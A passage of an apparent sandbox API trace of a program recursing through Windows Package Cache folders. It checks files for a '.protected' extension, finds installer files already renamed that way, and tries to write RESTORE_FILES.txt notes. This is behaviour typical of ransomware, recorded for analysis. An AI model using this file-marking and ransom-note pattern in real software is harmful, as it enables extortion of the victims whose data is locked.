(in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\.") returned 97 [0093.364] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\..") returned 98 [0093.364] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.364] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.364] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.364] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned 121 [0093.364] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0093.364] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0093.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*") returned 123 [0093.364] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\.") returned 123 [0093.364] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.364] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.364] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\..") returned 124 [0093.364] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.364] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 140 [0093.365] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.365] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.365] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi.protected") returned 160 [0093.365] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.365] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.365] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.365] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt") returned 139 [0093.365] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.365] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.365] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.366] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.366] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.366] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.366] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.366] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.366] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.366] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.366] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.367] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.367] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005") returned 86 [0093.367] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2=".") returned 1 [0093.367] lstrcmpW (lpString1="{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005", lpString2="..") returned 1 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*") returned 88 [0093.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\.") returned 88 [0093.368] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\..") returned 89 [0093.368] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.368] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.368] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.368] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages") returned 95 [0093.368] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.368] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.368] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*") returned 97 [0093.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\.") returned 97 [0093.369] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\..") returned 98 [0093.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.369] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.369] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64") returned 118 [0093.369] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2=".") returned 1 [0093.369] lstrcmpW (lpString1="vcRuntimeMinimum_amd64", lpString2="..") returned 1 [0093.369] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*") returned 120 [0093.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.369] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\.") returned 120 [0093.369] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.369] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.369] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\..") returned 121 [0093.369] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.369] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab.protected") returned 137 [0093.370] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.370] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.370] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.protected") returned 154 [0093.370] StrStrIW (lpFirst="vc_runtimeMinimum_x64.msi.protected", lpSrch=".protected") returned=".protected" [0093.370] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.370] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt") returned 136 [0093.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.370] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.370] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.371] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt") returned 113 [0093.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.371] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.371] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.371] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.371] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.371] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.371] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.371] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt") returned 104 [0093.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.372] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.372] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 86 [0093.372] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2=".") returned 1 [0093.372] lstrcmpW (lpString1="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="..") returned 1 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned 88 [0093.372] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\.") returned 88 [0093.372] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\..") returned 89 [0093.372] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.372] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 95 [0093.373] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.373] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned 97 [0093.373] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\.") returned 97 [0093.373] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.373] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\..") returned 98 [0093.373] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.373] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.373] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.373] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 113 [0093.373] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.374] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 119 [0093.374] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0093.374] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned 121 [0093.374] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\.") returned 121 [0093.374] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\..") returned 122 [0093.374] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.374] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 138 [0093.374] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 137 [0093.374] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.374] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.374] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | 